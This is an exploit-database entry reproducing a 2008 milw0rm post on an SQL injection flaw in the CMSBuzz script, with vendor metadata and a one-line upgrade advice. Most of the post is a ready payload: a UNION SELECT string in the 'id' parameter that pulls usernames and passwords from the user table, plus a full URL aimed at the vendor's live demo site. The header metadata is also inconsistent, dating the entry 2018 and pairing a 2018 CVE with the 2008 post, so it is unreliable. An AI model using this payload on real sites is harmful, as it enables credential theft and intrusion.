rEm0te sql injction VulnErability (cmsbuzz script)

vendor:

CMSBuzz

by:

Security Fears Team

5.5

CVSS

MEDIUM

Remote SQL Injection

CWE

Product Name: CMSBuzz

Affected Version From: 1

Affected Version To: 1.2

Patch Exists: YES

Related CWE: CVE-2018-19072

CPE: a:cmsbuzz:cmsbuzz:1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2018

rEm0te sql injction VulnErability (cmsbuzz script)

CMSBuzz is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Upgrade to the latest version of CMSBuzz

Source

Exploit-DB raw data:

#################################################################################################
####################################  proud to be muslim   ######################################
###                                                                                           ###
###                            rEm0te sql injction VulnErability                              ###
###                                                                                           ###
###                                    (cmsbuzz script)                                       ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### AuTh0r : security fears team                                                              ###
###                                                                                           ###
### Home   : WwW.alsonaa.com                                                                  ###
###                                                                                           ###    
### members: HeB4RieH , germaya_x                                                             ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### Script Name : cmsbuzz                                                                     ###
###                                                                                           ###
### download    : http://cmsbuzz.com/purchase.php                                             ###
###                                                                                           ###
### Email       : s-fteam@securityfears.cc                                                    ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### d0rk ::  "use your mind"                                                                  ###
###                                                                                           ###
###                                                                                           ###
### -(:: sql Code ::)-                                                                        ###
###        ?action=playgame&id=(sql)                                                          ###
###(sql)=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--                           
###                                                                                           ###
#################################################################################################
###                                                                                           ###
### -(::  l!ve demo ::)-                                                                      ###
###                                                                                           ###
###http://demo.cmsbuzz.com/?action=playgame&id=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--
###                                                                                           ###
###                                                                                           ###
########################                                                    #####################
########################                                                    #####################
#################################################################################################
#################################################################################################
                                   -(:: !GreTzZ! ::)-
 ::SnIpEr.KiLLeR::fa6al error::black cheetah::X_HaCker::str0ke::MusliMs HaCkErs:: 
#################################################################################################
#################################################################################################

# milw0rm.com [2008-09-09]